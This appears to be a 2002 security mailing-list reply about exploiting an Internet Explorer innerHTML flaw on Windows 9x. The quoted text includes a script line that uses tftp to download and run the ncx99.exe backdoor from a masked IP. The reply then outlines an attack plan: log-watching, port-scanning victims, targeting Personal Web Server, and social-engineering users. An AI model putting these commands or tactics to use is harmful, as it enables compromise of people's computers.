Felipe Franciosi wrote...

> > var programName=new Array(
> > 'c:/winnt/system32/tftp.exe -i xxx.xxx.xxx.xxx GET ncx99.exe',
> > 'c:/winnt/system32/ncx99.exe',
> > );
>
> MS Windows 9x don't have trivial ftp client by default... I was
> thinking how this could be exploitable on these versions...
>
> The FTP client offers the option to read a text-file containing
> line separated commands.
>
> But I couldn't get to work something like:
> var prog...
> 'c:/command.com /c echo bin > c:/list.txt',
> 'c:/command.com /c echo GET something >> c:/list.txt'
>
> this won't create 'list.txt'... Any ideas why? Or how some could
> get around it?

On Win9x systems, rather than targeting FTP or a command shell, what about starting up something that simply causes an exploitable process to listen on some port # (will vary, depending on application) and then separately trying to exploit that.

One could monitor one's web server access logs to notice when someone downloaded the first half of the exploit (the innerhtml hole). (Alternately, write a servlet/JSP/CGI script and you don't even need to monitor the log file.) If the User-Agent corresponds to MSIE, then at some time later (perhaps wait t minutes later), gently port scan the remote IP address to see if the application was launched. If the port scan succeeds, then go into full exploit mode.

(This assumes an exploitable application that is normally not running and no pesky personal firewalls, etc. to be sure. But certainly some combinations would be vulnerable given the cluelessness of the typical Windoze users and their disdain for ever updating their system with security patches.)

A bigger assumption is choosing an exploitable application that (preferably) launches without user intervention or requires any command line arguments. I don't know that much about Windoze apps, so all I have is one candidate application [see below.] (I do all my development for Solaris; I just have to use WinNT & LookOut! from work--sigh).
However, the "Personal Web Server" that comes with Win98 (and perhaps other Windoze systems?) comes to mind as a possibility. The Personal Web Server is so full of holes that the executable name is probably 'swisscheese.exe'. I seem to recall doing a Win9x re-install for a friend where I think I was prompted as to whether I wanted to RUN it, but I don't remember it prompting if I wanted to load it. IIRC, that might mean that it was installed, but just not started, by default. (Or perhaps it's part of a commonly chosen package.) I never ran PWS, so I don't know if the Personal Web Server needs to be configured first to run or what. (If so, perhaps a bit of social engineering is in order. Tell people that a certain wizard dialog box is going to pop-up and give them instructions how to configure it, making up some excuse as to why they should do this. Surely someone would fall for it.)

The "good" thing about the Personal Web Server is that I believe that Microsoft's attitude with it with respect to security vulnerabilities has been pretty much to ignore them and to tell people to run IIS instead (since IIS is so much more secure ;-).

Anyway, just my $.02 worth. BTW, just so you know, these are my personal opinions and in no way reflect the views of my company.

---
Kevin W. Wall
Qwest IT, Inc. / Security Infrastructure Dev Team
Kevin.Wallat_private
Phone: 614.932.5542

"Wipe Info uses hexadecimal values to wipe files. This provides more security than wiping with decimal values." -- Norton System Works 2002 manual, pg 160
This archive was generated by hypermail 2b30 : Thu Mar 14 2002 - 12:22:57 PST